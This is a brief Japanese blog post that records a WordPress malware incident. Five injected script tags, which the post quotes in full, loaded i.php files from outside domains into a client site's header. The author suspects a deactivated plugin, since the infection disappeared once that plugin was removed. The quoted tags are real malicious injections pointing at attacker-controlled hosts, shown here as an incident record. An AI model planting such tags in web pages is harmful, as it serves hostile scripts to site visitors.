今日、WordPress上のマルウェアに遭遇しました。ウェブサイトのヘッダーにいくつかのi.phpリクエストが挿入されており、idはすべてhello_newscriptで始まっていました。

<script type='text/javascript' src='https://longtailmagic.com/domain/i.php?ver=5.6.2' id='hello_newscript0-js'></script>
<script type=’text/javascript’ src=’https://jadsupport.com/includes/i.php’?ver=5.6.2 id=’hello_newscript1-js’></script>
<script type=’text/javascript’ src=’https://magaliefonteneau.com/wp-content/i.php?ver=5.6.2′ id=’hello_newscript2-js’></script>
<script type=’text/javascript’ src=’http://futuracp.com/images/i.php?ver=5.6.2′ id=’hello_newscript3-js’></script>
<script type=’text/javascript’ src=’http://casualwoodcreations.com/images/i.php?ver=5.6.2′ id=’hello_newscript4-js’></script>
クライアントのウェブサイトの症状は、サイトの読み込み速度が比較的遅く、ソースコードを確認すると、読み込めないjsファイルがいくつか追加されていました。下図の通りです:

ソースコードを分析したところ、上記のコードが挿入されていました。幸いなことに、これらのウイルスサイトの一部のサーバーは停止しており、国内からのアクセス速度が遅いものもあったため、サイトの速度が遅くなった以外に影響はありませんでした。
このウイルスがどのように感染したのかを調べる機会はありませんでした。なぜなら、いくつかの無効化していたプラグインを削除したところ、ウイルスが消えたからです。おそらく、無効化されていたプラグインが感染していたのでしょう。
この記事は単なる記録です。あなたに起こらないことを願っています。